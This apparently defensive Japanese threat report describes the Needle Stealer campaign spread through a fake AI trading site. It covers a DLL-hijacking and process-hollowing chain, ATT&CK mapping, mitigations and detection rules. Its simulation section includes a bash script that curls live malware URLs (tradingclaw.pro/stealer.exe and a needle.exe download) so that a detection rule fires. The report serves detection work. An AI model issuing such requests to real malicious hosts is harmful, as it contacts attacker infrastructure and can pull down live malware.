フォローする 
概要
AI駆動のトレーディングアシスタントを広告する詐欺サイトが、Needle Stealer情報スティーラーを拡散するために使用されています。感染チェーンは、DLLハイジャックとプロセスホローイングに依存してマルウェアを注入し RegAsm.exe、正当なシステム活動に混じることを助けます。有効になると、スティーラーはブラウザデータを収集し、暗号通貨ウォレット情報を標的にし、妥協を深めるために悪意のあるブラウザ拡張機能を展開することができます。攻撃者が制御するインフラストラクチャとの通信は、複数のHTTP APIエンドポイントを介して処理されます。
調査
研究者たちは、 tradingclaw.proからダウンロードされたZIPアーカイブに遡る感染フローを追跡しました。そこには iviewers.dllという名前のDLLローダーが含まれており、そのローダーが二次DLLを落とし、 RegAsm.exe を空洞化してGolangベースのNeedle Stealerを起動しました。さらなる解析により、スティーラーが悪意あるブラウザ拡張機能を含む隠蔽されたZIPアーカイブを抽出し、そのコマンドアンドコントロールサーバーを定義する設定ファイルと共に見つかりました。
緩和策
ユーザーは信頼できないウェブサイトからのソフトウェアダウンロードを避け、インストーラーを実行する前に常に発行者の署名を確認してください。セキュリティチームはインストールされたブラウザ拡張機能を定期的に監査し、無許可または疑わしいものを削除するべきです。ネットワーク監視を設定して、該当キャンペーンに関連する既知の悪意のあるドメインやIPアドレスへのトラフィックを検出すべきです。エンドポイント保護ツールも、DLLハイジャックの振る舞いやプロセスホローイング技術の特定にチューニングされるべきです。
応答
防御者は iviewers.dll の実行および注入の兆候についてエンドポイントのテレメトリーをレビューするべきです。 RegAsm.exeへのブロックをファイアウォールまたはプロキシレベルで設定します。報告されたハッシュやファイル名に一致するファイルをセキュリティチームが隔離し、 %LOCALAPPDATA%PackagesExtensionsから疑わしい拡張機能を削除し、影響を受けたアカウントに関連する資格情報をリセットします。潜在的に影響を受けた暗号通貨ウォレットも認証されていない活動について確認するべきです。
"graph TB %% クラス定義 classDef action fill:#99ccff classDef malware fill:#ff9999 classDef process fill:#ccccff %% ノード step_a["<b>アクション</b> – <b>T1659 コンテンツ注入</b><br/>ユーザーが悪意のあるTradingClawサイトを訪れ、悪意のあるコンテンツを取得します。<br/><b>説明</b>: 攻撃者が正当なウェブサイトに悪意のあるコンテンツを注入してペイロードを配信します。"] class step_a action step_b["<b>アクション</b> – <b>T1204.001 悪意のあるリンク</b><br/>ユーザーがクリックして悪意のあるZIPアーカイブをダウンロードします。<br/><b>説明</b>: ユーザーが資格情報収集または他のペイロードダウンロードにつながる悪意のあるリンクをクリックするようにトリックされます。"] class step_b action step_c["<b>アクション</b> – 複数の技術<br/><b>マスカレーディング T1036.001</b>: iviewers.dllが正当なファイルを模倣します。<br/><b>信頼コントロールのサブバート T1553.002</b>: DLLのハイジャックによって信頼を回避します。<br/><b>システムバイナリプロキシ実行 T1218</b>: 実行のためにシステムバイナリを使用します。<br/><b>信用された開発者ユーティリティプロキシ実行 T1127</b>: 信用されたユーティリティを悪用します。<br/><b>反射型コードローディング T1620</b>: ディスクに触れることなくコードをロードします。<br/><b>説明</b>: iviewers.dllを介したDLLハイジャックで悪意のあるコードを実行します。"] class step_c action step_d["<b>プロセス注入</b> – <b>T1055.012 プロセスホローイング</b><br/>RegAsm.exeプロセスに悪意のあるコードが注入されます。<br/><b>説明</b>: 攻撃者が中空プロセスを作成し、悪意のあるペイロードを挿入します。"] class step_d process step_e["<b>マルウェア</b> – Needle Stealerコア<br/>実行後に被害者データを収集します。"] class step_e malware step_f["<b>資格情報アクセス</b> – <b>T1115 クリップボードデータ</b><br/>クリップボードの内容を収集します。<br/><b>説明</b>: クリップボードにコピーされたデータ、例えばパスワードをキャプチャします。"] class step_f action step_g["<b>入力キャプチャ</b> – <b>T1056 入力キャプチャ</b><br/>入力フォームデータをキャプチャします。<br/><b>説明</b>: キーストロークまたはフォームフィールドを記録して資格情報を盗みます。"] class step_g action step_h["<b>資格情報アクセス</b> – 複数の技術<br/><b>ブラウザ情報探索 T1217</b>: インストールされたブラウザを列挙します。<br/><b>Webブラウザからの資格情報 T1555.003</b>: 保存されたパスワードを抽出します。<br/><b>WebセッションCookie T1550.004</b>: セッションクッキーを読む。<br/><b>WebセッションCookieの盗難 T1539</b>: クッキーを流出させます。<br/><b>Web資格情報の偽造 T1606</b>: 偽の資格情報を作成します。<br/><b>説明</b>: ブラウザデータ、資格情報、クッキーを盗みます。"] class step_h action step_i["<b>永続性</b> – <b>T1176 ソフトウェア拡張</b><br/>悪意のあるブラウザ拡張機能をインストールします。<br/><b>説明</b>: 拡張機能はブラウザに永続し、トラフィックを変更できます。"] class step_i action step_j["<b>アクション</b> – 拡張機能がトラフィックを操作<br/>要求をリダイレクトし、ダウンロードを置き換え、スクリプトを挿入します。"] class step_j action step_k["<b>コマンドと制御</b> – 複数の技術<br/><b>エンコードされたデータ T1132.001</b>: 流出する前にデータをエンコードします。<br/><b>C2チャネル経由の流出 T1041</b>: C2を通じてデータを送信します。<br/><b>説明</b>: 盗まれたデータをリモートサーバーに通信します。"] class step_k action %% コネクション step_a –>|leads_to| step_b step_b –>|leads_to| step_c step_c –>|leads_to| step_d step_d –>|leads_to| step_e step_e –>|collects| step_f step_e –>|collects| step_g step_e –>|collects| step_h step_e –>|installs| step_i step_i –>|enables| step_j step_j –>|communicates| step_k "
攻撃フロー
検出
Oleviewを使用したDLLサイドローディングの可能性のある試み (image_load経由)
表示
不審なコマンド・アンド・コントロール (TLD) DNSリクエストによる異常なトップレベルドメイン
表示
IOC(HashSha256)で検出: 悪意のある取引サイトがマルウェアを落とし、ブラウザーを攻撃者に渡します
表示
IOC(SourceIP)で検出: 悪意のある取引サイトがマルウェアを落とし、ブラウザーを攻撃者に渡します
表示
IOC(DestinationIP)で検出: 悪意のある取引サイトがマルウェアを落とし、ブラウザーを攻撃者に渡します
表示
悪意のあるTradingClawおよびリダイレクトサイトの検出 [Webサーバー]
表示
シミュレーション実行
前提条件: テレメトリー&ベースラインの事前飛行チェックに合格していること。
根拠: このセクションでは、検出ルールをトリガーするよう設計された敵の技術(TTP)の正確な実行を詳述します。コマンドとナarrationは、特定されたTTPを直接反映し、検出ロジックによって期待される正確なテレメトリーを生成することを目的としています。
-
攻撃のストーリーとコマンド:
Needle Stealerマルウェアを入手した攻撃者がそれを悪意のあるドメインtradingclaw.proにホスティングしています。攻撃者は被害者に悪意のあるリンク(例:フィッシングメール経由)を開くように促します。被害者のブラウザーはHTTP GETリクエストをhttp://tradingclaw.pro/stealer.exeに行います。これはプロキシログに記録されます。URLに正確な文字列tradingclaw.proが含まれているため、Sigmaルールの条件 (url|contains) は真と評価され、アラートが生成されます。これをテスト環境で再現するために、私たちは悪意のあるドメインに直接
curlリクエストを発行します。このリクエストは、ドメインの一致のみによってアラートが駆動されるように、典型的なユーザーのトラフィックのように見せるために(標準のユーザーエージェント、特別なヘッダーは無し)作成されます。 -
回帰テストスクリプト:
#!/usr/bin/env bash # ------------------------------------------------------------ # "悪意のあるTradingClaw"検出ルールをトリガーするために悪意のあるアクセスをシミュレートします。 # ------------------------------------------------------------ set -euo pipefail # ルールで使用される正確な文字列の悪意のあるURLを定義します MALICIOUS_URLS=( "http://tradingclaw.pro/stealer.exe" "https://studypages.com/download/needle.exe" ) for url in "${MALICIOUS_URLS[@]}"; do echo "[*] ${url} にリクエストします" # ブラウザを模倣するためにリアルなユーザーエージェントを使用します curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0 Safari/537.36" -s -o /dev/null "${url}" done echo "[+] シミュレーション完了。" -
クリーンアップコマンド:
# curlリクエストによって永続的なアーティファクトは作成されません。 # DNSキャッシュをフラッシュして、後のテストでドメインが意図せず再利用されないようにします。 if command -v ipconfig >/dev/null 2>&1; then ipconfig /flushdns elif command -v systemd-resolve >/dev/null 2>&1; then systemd-resolve --flush-caches fi echo "[+] クリーンアップ完了。"
レポートの終わり